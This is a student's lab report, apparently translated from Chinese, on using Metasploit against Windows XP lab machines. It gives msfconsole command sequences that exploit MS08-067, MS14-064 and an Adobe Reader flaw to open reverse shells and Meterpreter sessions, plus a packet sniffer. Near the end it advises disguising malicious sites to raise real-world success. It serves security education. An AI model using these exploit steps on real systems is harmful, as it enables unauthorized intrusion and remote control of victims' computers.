2017-2018-2 20155315 "Network Countermeasure Technology" Exp5: MSF Basic Application

Purpose

Learn to use metasploit for simple attack operation
tutorial

Experimental content

There are six modules in metasploit which are

渗透攻击模块（Exploit Modules）
辅助模块（Auxiliary Modules
攻击载荷（Payload Modules）
空字段模块（Nop Modules）
编码模块（Encoders）
后渗透攻击模块(Post)

This experiment used exploitandauxiliary
exploit : Penetration attack module, which refers to exploiting a certain vulnerability to attack the target host. Penetration means that the attacker injects his own malicious code into the system of the target host through a vulnerability on the target host, just like termites, slowly penetrate the entire building from a hole.
auxiliary : Auxiliary module, which can help penetration testers to obtain rich intelligence information of the target system before conducting penetration attacks, so as to launch more targeted and precise attacks. The relationship between it exploitand the sniper is like the relationship between an observer and a sniper. The former is responsible for observing the network environment and obtaining accurate information; the latter is responsible for attacking based on the collected information.

Experimental procedure

(1) An active attack practice, such as ms08_067

The main principle of the MS08_67 vulnerability attack is that the attacker uses the SMB service port 445 opened by default on the victim host, sends malicious data to this port, calls a function of the server service through the MSRPC interface, and destroys the program's stack buffer area to obtain remote code execution. permissions to fully control the host.

lab environment

computer	system	IP address
host	time	192.168.19.130
target drone	Windows XP SP3 English(AlwaysOn NX)	192.168.19.132

Open msfconsole to set load, parameters, run

use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.19.132              //靶机的IP地址
set LHOST 192.168.19.130              //本机的IP地址
set LPORT 5315
exploit

At the beginning target 10, after viewing the tutorial, I decided to set up set target 0a system that allows kali to automatically identify the target drone, so that the success rate of the attack is higher.
result
Let's see what program the malicious data is disguised as.
Reset the load to set payload windows/meterpreter/reverse_tcp, after exploit, use getpidthe process ID of our disguised process
Use to ps -ef | grep 1064view progress
Through the analysis of the last experiment, we know that Svchost.exe is the general host process name of the service running from the dynamic link library (DLL). This program is very important to the normal operation of the system and cannot be terminated. That is to say, our attack is hidden under the system program, which is still very scary to think about.

(2) An attack against the browser, such as ms14_064

lab environment
- Internet Exploer 8

computer	system	IP address
host	time	192.168.19.130
target drone	Windows XP SP3	192.168.19.131

At the beginning, when using the attack mentioned in the tutorial, the ms11_050process is always killed by the data execution protection program. It is useless to try to reduce the security level of the IE browser to the lowest level, and the continuous attempts 03_020``ms12_037``````ms13_009are unsuccessful .
Re-find exploits about ie, filter by time and level, and finally selectwindows/browser/ms14_064_ole_code_execution

Microsoft Windows OLE Remote Code Execution Vulnerability, OLE (Object Linking and Embedding) is a technology that allows applications to share data and functions, a remote attacker can exploit this vulnerability to execute arbitrary code through a constructed website, affecting Win95+IE3 – Win10+IE11 full version
It looks like this vulnerability should be one hit for win xp.
use windows/browser/ms14_064_ole_code_executionLook at the parameters that need to be set

Set loads, parameters, run

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.19.130             
set LPORT 2015
set URIPATH zyl_

result
The target machine opens the IE browser and enters the generated URL, and the 8080 port of kali listens to obtain a connection and establishes a session
open session

(3) An attack against the client, such as Adobe

lab environment
- Adobe Reader 9.3

computer	system	IP address
host	time	192.168.19.130
target drone	Windows XP SP3	192.168.19.131

The vulnerability used in this experiment isexploit/windows/browser/adobe_cooltype_sing

This vulnerability is for Adobe Reader versions prior to 9.3.4, a buffer overflow caused by a parameter named uniqueName in a SING table object

Set loads, parameters, run

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.19.130             
set LPORT 5315
set FILENAME 20155315
exploit

result

Open the monitor module

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.19.130             
set LPORT 1111

Copy the generated malicious file to the target machine. After running, kali shows that the connection is successful.

(4) Attacks of Application Auxiliary Modules

computer	system	IP address
host	time	192.168.19.130
target drone	Windows XP SP3	192.168.19.131

Enter the /usr/share/metasploit-framework/modules/auxiliarycatalog to see what items are available
Here we see an interesting one sniffer, which is a network sniffer.
Enter the directory and find that there is only onepsnuffle.rb
in msfconsole, use auxiliary/sniffer/psnufflesee details
You can see that it sniffs any protocol, the length of the capture is 65535, and the time limit is 500s
runOpen Baidu in the target drone, kali captured this conversation

Problems encountered in the experiment

When I did the first experiment, it was
suspected that the 445 port of the target machine was not open. After setting up according to the online tutorial , open cmd to view the 445 port and re-exploit, and the connection was successful.
When doing the second experiment, the target machine was always blocked by the implementation of the data protection mechanism to open the web page.
As far as the experimental process is concerned, IE browser or data execution protection can identify the older vulnerabilities, but if the updated vulnerabilities do not download patches, the port of the target machine is equivalent to a crack in the window, as long as the malicious website Once opened, attackers can hack into the drone effortlessly.

lab question answer

Explain what is exploit, payload, encode in your own words.
- Exploit is to implant its own malicious code into the target host through a small loophole to achieve the purpose of attack, which refers to a means of attack
- The payload is equivalent to a piece of malicious code, or a container with malicious code, through which the target host can be controlled
- Encode is an encoder, which encapsulates or disguises malicious code through encoding so that it is not detected as malware by the target host.

What skills or steps are still missing from actual combat?

The premise of starting actual combat is to have enough accurate information, that is, the information collection in the early stage should be more comprehensive and thorough.
As far as this experiment is concerned, most of the target machines are operated to trigger malicious code to make the attacker's intrusion succeed. In real life, suspicious files, suspicious URLs, etc. will not be actively clicked. Therefore, if you want to carry out actual combat, it is best to edit the malicious website again or modify the domain name to improve the possibility of success.

Experimental summary

This experiment went relatively smoothly. When the attack was successful, I felt cool, but there was still a certain distance from the actual combat. In addition, every time I do an experiment, I deeply feel that the Internet is really too insecure. There are so many powerful people, so it is still necessary to protect the computer!